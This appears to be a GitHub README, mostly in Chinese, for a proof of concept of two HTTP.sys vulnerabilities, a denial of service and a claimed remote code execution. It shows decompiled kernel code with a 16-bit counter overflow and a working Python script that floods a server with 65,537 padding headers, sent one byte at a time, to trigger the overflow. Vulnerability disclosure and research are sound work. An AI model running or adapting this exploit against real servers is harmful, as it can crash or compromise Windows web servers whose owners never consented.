dhmosfunk/CVE-2026-49160-CVE-2026-47291-HTTP.sys

# CVE-2026-49160 & CVE-2026-47291 HTTP.sys PoC HTTP.sys 拒绝服务漏洞 \ HTTP.sys 远程代码执行漏洞 由于 GitHub 的文件大小限制，此 PoC (CVE-2026-49160) 的演示视频作为附件托管在 [Releases](../../releases) 中。 # CVE-2026-47291 漏洞代码： ``` if ((DAT_0 & 1) != 0) { local_e8 = *(int **)(piVar16 + 0x10); local_e0 = (char *)ppuVar3; WPP_SF_qII(0x408,0x10b,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,piVar16); } if (*(ushort *)((longlong)piVar16 + 0x642) < *(ushort *)(piVar16 + 400)) { LAB_8: ppuVar1 = ppuVar3 + 4; *(undefined ***) (*(longlong *)(piVar16 + 0x192) + (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) * 8 ) = ppuVar3; *(short *)((longlong)piVar16 + 0x642) = *(short *)((longlong)piVar16 + 0x642) + 1; LOCK(); iVar10 = *(int *)ppuVar1; *(int *)ppuVar1 = *(int *)ppuVar1 + 1; UNLOCK(); if ((UxDebugCheckRefcount != '\0') && (iVar10 + 1 < 0)) { UlBugCheckEx(3,ppuVar1,10,(longlong)(iVar10 + 1)); pcVar4 = (code *)swi(3); (*pcVar4)(); return; } cVar6 = '\x01'; } else { local_e8 = (int *)CONCAT44(local_e8._4_4_,1); _Dst = (void *)ExAllocatePool3(0x42,(ulonglong)*(ushort *)(piVar16 + 400) * 8 + 0x28, 0x52526c55,&UxLowPriorityPool); if (_Dst != (void *)0x0) { memmove(_Dst,*(void **)(piVar16 + 0x192), (ulonglong)*(ushort *)((longlong)piVar16 + 0x642) << 3); if (1 < *(ushort *)(piVar16 + 400)) { ExFreePoolWithTag(*(undefined8 *)(piVar16 + 0x192),0); } *(short *)(piVar16 + 400) = (short)piVar16[400] + 5; <- unsigned short 16bit *(void **)(piVar16 + 0x192) = _Dst; goto LAB_8; } } if ((DAT_0 & 1) != 0) { WPP_SF_D(0x408,0x10c,&WPP_35392aa6288d35088b5e7b5e64cc7a3b_Traceguids,cVar6); } ``` 此代码 ``` import socket, ssl, time ctx = ssl.create_default_context() ctx.check_hostname = False ctx.verify_mode = ssl.CERT_NONE raw_sock = socket.create_connection(("hello.lab", 443)) s = ctx.wrap_socket(raw_sock, server_hostname="hello.lab") s.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1) request = b"GET / HTTP/1.1\r\nHost: hello.lab\r\nConnection: keep-alive\r\n" for i in range(0xFFFF+2): request += f"X-Pad-{i}: value{i}\r\n".encode() request += b"\r\n" for b in request: s.send(bytes([b])) try: response = s.recv(4096) print(response) except ConnectionResetError as e: print("Connection reset:", e) print("Connection held open. Press Ctrl+C to close.") try: while True: time.sleep(1) except KeyboardInterrupt: print("Closing.") s.close() ``` 将计数器值增加 +5。 让脚本运行约 30 分钟，因为每接收一个 buffer 计数器就会增加 +5... 触发的溢出 调试器中的计数器：

标签：HTTP.sys, PoC, 拒绝服务攻击, 暴力破解, 编程工具, 远程代码执行, 逆向工具, 配置错误